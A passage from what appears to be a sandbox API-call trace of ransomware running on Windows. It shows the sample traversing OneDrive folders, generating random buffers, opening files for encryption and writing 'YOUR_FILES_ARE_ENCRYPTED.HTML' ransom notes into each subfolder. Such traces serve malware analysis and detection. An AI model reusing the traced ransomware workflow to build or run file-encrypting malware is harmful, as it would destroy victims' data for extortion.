param_2="%02X" | out: param_1="1A") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="9F") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="B6") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="34") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="0E") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="96") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="6E") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="0F") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="4C") returned 2 [0112.577] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="26") returned 2 [0112.577] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="D9") returned 2 [0112.577] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="3B") returned 2 [0112.577] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="C1") returned 2 [0112.577] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="C0") returned 2 [0112.577] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="80") returned 2 [0112.577] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="0B") returned 2 [0112.577] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="9E") returned 2 [0112.577] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="C9") returned 2 [0112.577] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="16") returned 2 [0112.578] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcp120.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcp120.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcp120.dll" [0112.578] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.578] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0112.578] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbb9ac6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbbb9ac6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xddeae4a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0xed0a0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0112.578] StrStrIW (lpFirst="msvcr120.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.578] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcr120.dll") returned 88 [0112.578] PathFindExtensionW (pszPath="msvcr120.dll") returned=".dll" [0112.578] lstrlenW (lpString=".dll") returned 4 [0112.578] PathFindExtensionW (pszPath="msvcr120.dll") returned=".dll" [0112.578] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\msvcr120.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0112.579] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=970912) returned 1 [0112.579] GetProcessHeap () returned 0x600000 [0112.579] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0112.596] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="ED") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="5D") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="45") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="BC") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="C4") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="FA") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="30") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="AE") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="5B") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="22") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="C2") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="6C") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="C2") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="57") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="BD") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="2D") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="92") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="F5") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="76") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="67") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="F3") returned 2 [0112.597] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="B3") returned 2 [0112.597] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="C6") returned 2 [0112.597] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="AA") returned 2 [0112.597] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="0B") returned 2 [0112.597] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="D5") returned 2 [0112.597] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="38") returned 2 [0112.597] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="47") returned 2 [0112.597] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="05") returned 2 [0112.597] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="E1") returned 2 [0112.597] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="40") returned 2 [0112.597] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="47") returned 2 [0112.598] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcr120.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcr120.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcr120.dll" [0112.598] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.598] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0112.598] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e38526, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1e38526, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1e38526, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mt-mt", cAlternateFileName="")) returned 1 [0112.598] StrStrIW (lpFirst="mt-mt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.598] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mt-mt") returned 81 [0112.598] GetProcessHeap () returned 0x600000 [0112.598] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.601] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mt-mt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mt-mt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mt-mt" [0112.601] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mt-mt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mt-mt\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mt-mt\\*" [0112.601] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mt-mt\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e38526, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1e38526, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2d4510a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x626838 [0112.605] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e38526, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1e38526, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2d4510a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.605] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d4510a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2d4510a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x3bb95f5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.605] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.605] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mt-mt\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.605] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.605] lstrlenW (lpString=".mui") returned 4 [0112.605] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.605] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d4510a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2d4510a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x3bb95f5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.605] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0112.605] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mt-mt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.605] GetProcessHeap () returned 0x600000 [0112.605] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mt-mt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\mt-mt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.606] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.607] CloseHandle (hObject=0x328) returned 1 [0112.607] GetProcessHeap () returned 0x600000 [0112.607] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.607] GetProcessHeap () returned 0x600000 [0112.607] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.608] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f00a8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x3f00a8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x3f00a8b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="nb-no", cAlternateFileName="")) returned 1 [0112.608] StrStrIW (lpFirst="nb-no", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.608] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nb-no") returned 81 [0112.608] GetProcessHeap () returned 0x600000 [0112.608] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.609] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nb-no" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nb-no") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nb-no" [0112.609] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nb-no", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nb-no\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nb-no\\*" [0112.609] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nb-no\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f00a8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x3f00a8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d8cca0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.610] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f00a8b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x3f00a8b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5d8cca0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.610] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8cca0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5d8cca0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6d7e5c9, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x14cc0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.610] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.610] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nb-no\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.610] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.610] lstrlenW (lpString=".mui") returned 4 [0112.610] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.610] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8cca0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5d8cca0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6d7e5c9, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x14cc0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.611] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.611] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nb-no\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.611] GetProcessHeap () returned 0x600000 [0112.611] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\nb-no\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\nb-no\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.611] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.612] CloseHandle (hObject=0x328) returned 1 [0112.612] GetProcessHeap () returned 0x600000 [0112.612] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.612] GetProcessHeap () returned 0x600000 [0112.612] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.613] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a4f09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7a4f09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7a4f09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ne-np", cAlternateFileName="")) returned 1 [0112.613] StrStrIW (lpFirst="ne-np", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.613] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ne-np") returned 81 [0112.613] GetProcessHeap () returned 0x600000 [0112.613] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.614] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ne-np" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ne-np") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ne-np" [0112.614] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ne-np", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ne-np\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ne-np\\*" [0112.614] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ne-np\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a4f09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7a4f09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x8fea519, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x626838 [0112.615] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a4f09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7a4f09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x8fea519, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.615] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fea519, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x8fea519, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9aa4e53, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.615] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.615] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ne-np\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.615] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.615] lstrlenW (lpString=".mui") returned 4 [0112.615] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.615] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fea519, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x8fea519, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9aa4e53, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.615] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0112.615] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ne-np\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.617] GetProcessHeap () returned 0x600000 [0112.617] 